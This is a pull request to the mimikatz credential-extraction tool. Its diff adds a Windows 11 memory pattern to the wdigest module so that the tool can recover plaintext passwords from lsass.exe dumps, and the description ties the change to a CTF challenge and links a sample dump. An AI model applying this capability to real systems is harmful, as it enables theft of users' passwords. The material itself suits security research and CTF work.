### PR TITLE
Added support for Windows 11 wdigest

### DIFF
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
@@ -12,10 +12,12 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
 #elif defined(_M_X64)
 BYTE PTRN_WIN5_PasswdSet[]	= {0x48, 0x3b, 0xda, 0x74};
 BYTE PTRN_WIN6_PasswdSet[]	= {0x48, 0x3b, 0xd9, 0x74};
+BYTE PTRN_WIN11_PasswdSet[]	= {0x48, 0x3b, 0xd8, 0x74};
 KULL_M_PATCH_GENERIC WDigestReferences[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WIN5_PasswdSet),	PTRN_WIN5_PasswdSet},	{0, NULL}, {-4, 36}},
 	{KULL_M_WIN_BUILD_2K3,		{sizeof(PTRN_WIN5_PasswdSet),	PTRN_WIN5_PasswdSet},	{0, NULL}, {-4, 48}},
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_WIN6_PasswdSet),	PTRN_WIN6_PasswdSet},	{0, NULL}, {-4, 48}},
+	{KULL_M_WIN_BUILD_11_22H2,	{sizeof(PTRN_WIN11_PasswdSet),	PTRN_WIN11_PasswdSet},	{0, NULL}, {-4, 48}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WIN5_PasswdSet[]	= {0x74, 0x18, 0x8b, 0x4d, 0x08, 0x8b, 0x11};


### PR DESCRIPTION
During a recent CTF there was a challenge to get the plaintext password from an lsass.exe dump on a windows 11 machine. Since wdigest is disabled by default in windows 11 there was no support for this in mimikatz, but by simply adding the following code, everything works as expected. It should be mentioned that you can use the windbg plugin to do this natively, but adding support to the standalone mimikatz would be ideal.

I have attached the lsass dump from the competition in the PR so you can verify the changes.
[lsass.tar.gz](https://github.com/gentilkiwi/mimikatz/files/15287122/lsass.tar.gz)
